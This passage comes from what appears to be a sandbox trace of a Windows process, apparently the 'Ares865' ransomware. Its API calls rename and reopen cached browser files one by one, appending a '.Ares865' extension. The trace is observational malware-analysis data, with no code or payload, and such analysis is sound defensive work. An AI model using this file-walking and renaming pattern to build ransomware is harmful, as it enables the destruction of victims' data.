HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png.Ares865") returned 117 [0095.792] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png.ares865"), dwFlags=0x1) returned 1 [0095.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.793] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=913) returned 1 [0095.797] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js.Ares865") returned 116 [0095.797] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js.ares865"), dwFlags=0x1) returned 1 [0095.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.801] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31314) returned 1 [0095.807] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm.Ares865") returned 124 [0095.807] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm.ares865"), dwFlags=0x1) returned 1 [0095.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\async_usersync[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.813] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=995) returned 1 [0095.818] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.Ares865") returned 146 [0095.818] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24555) returned 1 [0095.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png.Ares865") returned 117 [0095.824] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png.ares865"), dwFlags=0x1) returned 1 [0095.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.826] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=426) returned 1 [0095.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg.Ares865") returned 117 [0095.830] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb8zbm[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7202) returned 1 [0095.834] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png.Ares865") returned 117 [0095.834] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png.ares865"), dwFlags=0x1) returned 1 [0095.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbb9wh0[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=564) returned 1 [0095.838] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg.Ares865") returned 117 [0095.839] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10951) returned 1 [0095.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg.Ares865") returned 117 [0095.846] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbdtcm[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1993) returned 1 [0095.849] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg.Ares865") returned 117 [0095.849] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7961) returned 1 [0095.866] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg.Ares865") returned 117 [0095.866] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.868] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1809) returned 1 [0095.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg.Ares865") returned 117 [0095.871] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9577) returned 1 [0095.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg.Ares865") returned 117 [0095.878] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12498) returned 1 [0095.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg.Ares865") returned 117 [0095.883] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.884] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2489) returned 1 [0095.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg.Ares865") returned 117 [0095.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.889] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18676) returned 1 [0095.892] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg.Ares865") returned 117 [0095.892] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.896] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7201) returned 1 [0095.899] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg.Ares865") returned 117 [0095.899] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.900] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5823) returned 1 [0095.903] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png.Ares865") returned 117 [0095.903] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet 